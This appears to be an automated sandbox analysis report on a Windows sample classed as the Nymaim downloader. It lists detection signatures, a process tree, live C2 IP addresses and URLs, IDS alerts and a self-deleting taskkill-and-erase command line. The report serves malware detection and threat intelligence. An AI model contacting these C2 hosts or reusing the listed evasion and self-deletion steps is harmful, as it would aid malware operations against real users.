Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:778228
MD5:e0f8085c7cb8eb9cf1c263bb12cfc6df
SHA1:a109ebcf251a1e69923c60330994190e40ab466c
SHA256:a28fb531e91695081ac9a3a08bd9be333462f84a3b1e9de81dda94869fd3d32a
Tags:exe
Infos:

Detection

Nymaim
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5340 cmdline: C:\Users\user\Desktop\file.exe MD5: E0F8085C7CB8EB9CF1C263BB12CFC6DF)
    • is-6A80U.tmp (PID: 5356 cmdline: "C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp" /SL4 $203A8 "C:\Users\user\Desktop\file.exe" 1818498 170496 MD5: E8176050192FBB976D70238E3C121F4C)
      • SplitFiles131.exe (PID: 5404 cmdline: "C:\Program Files (x86)\Split Files\SplitFiles131.exe" MD5: 361518D6CC3C25EEC2DFC1DE82B055B2)
        • cmd.exe (PID: 4988 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • taskkill.exe (PID: 5172 cmdline: taskkill /im "SplitFiles131.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.338322825.0000000003370000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000002.00000002.338187863.0000000003130000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000002.00000002.337441362.0000000000400000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.SplitFiles131.exe.3370000.3.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          2.2.SplitFiles131.exe.3370000.3.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            2.2.SplitFiles131.exe.400000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              2.2.SplitFiles131.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:107.182.129.235192.168.2.580497062852925 01/05/23-08:47:10.017687
                SID:2852925
                Source Port:80
                Destination Port:49706
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.545.139.105.17149705802041920 01/05/23-08:47:09.800462
                SID:2041920
                Source Port:49705
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.5107.182.129.23549706802852981 01/05/23-08:47:09.990287
                SID:2852981
                Source Port:49706
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.5107.182.129.23549706802852980 01/05/23-08:47:09.925610
                SID:2852980
                Source Port:49706
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://107.182.129.235/storage/extension.php2URL Reputation: Label: malware
                Source: http://171.22.30.106/URL Reputation: Label: malware
                Source: http://171.22.30.106/library.phpURL Reputation: Label: malware
                Source: http://107.182.129.235/storage/extension.phprAvira URL Cloud: Label: malware
                Source: http://171.22.30.106/uAvira URL Cloud: Label: malware
                Source: http://171.22.30.106/library.phpTAvira URL Cloud: Label: malware
                Source: http://107.182.129.235/storage/ping.phpSAvira URL Cloud: Label: malware
                Source: http://171.22.30.106/nAvira URL Cloud: Label: malware
                Source: http://171.22.30.106/library.php4Avira URL Cloud: Label: malware
                Source: http://107.182.129.235/storage/extension.phpzAvira URL Cloud: Label: malware
                Multi AV Scanner detection for domain / URL
                Source: http://171.22.30.106/library.phpTVirustotal: Detection: 8%Perma Link
                Source: http://107.182.129.235/storage/extension.phprVirustotal: Detection: 15%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exeReversingLabs: Detection: 50%
                Machine Learning detection for dropped file
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeJoe Sandbox ML: detected
                Source: 2.2.SplitFiles131.exe.10000000.5.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 0.0.file.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: 0.2.file.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: 2.2.SplitFiles131.exe.3370000.3.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_10001000 ISCryptGetVersion,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_10001130 ArcFourCrypt,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 2.2.SplitFiles131.exe.400000.0.unpack
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0045157C FindFirstFileA,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0048AC5C FindFirstFileA,6D2969D0,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00423E2D FindFirstFileExW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_1000959D FindFirstFileExW,
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exeCode function: 3_2_01314A1A FindFirstFileExW,
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2041920 ET TROJAN GCleaner Downloader Activity M8 192.168.2.5:49705 -> 45.139.105.171:80
                Source: TrafficSnort IDS: 2852980 ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET) 192.168.2.5:49706 -> 107.182.129.235:80
                Source: TrafficSnort IDS: 2852981 ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET) 192.168.2.5:49706 -> 107.182.129.235:80
                Source: TrafficSnort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 107.182.129.235:80 -> 192.168.2.5:49706
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 45.139.105.1
                Source: Malware configuration extractorIPs: 85.31.46.167
                Source: Malware configuration extractorIPs: 107.182.129.235
                Source: Malware configuration extractorIPs: 171.22.30.106
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: Joe Sandbox ViewIP Address: 45.139.105.171 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/
                Source: SplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000002.338008683.0000000001823000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.php
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.php2
                Source: SplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.phpC&
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000002.338008683.0000000001823000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.phpO
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.phpr
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.phpu
                Source: SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.phpz
                Source: SplitFiles131.exe, 00000002.00000002.337974221.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/ping.php
                Source: SplitFiles131.exe, 00000002.00000002.337974221.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/ping.phpS
                Source: SplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235ibrary.php
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/
                Source: SplitFiles131.exe, 00000002.00000003.292604795.000000000184A000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.php
                Source: SplitFiles131.exe, 00000002.00000002.337974221.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.php4
                Source: SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.phpT
                Source: SplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/n
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/u
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.139.105.171/
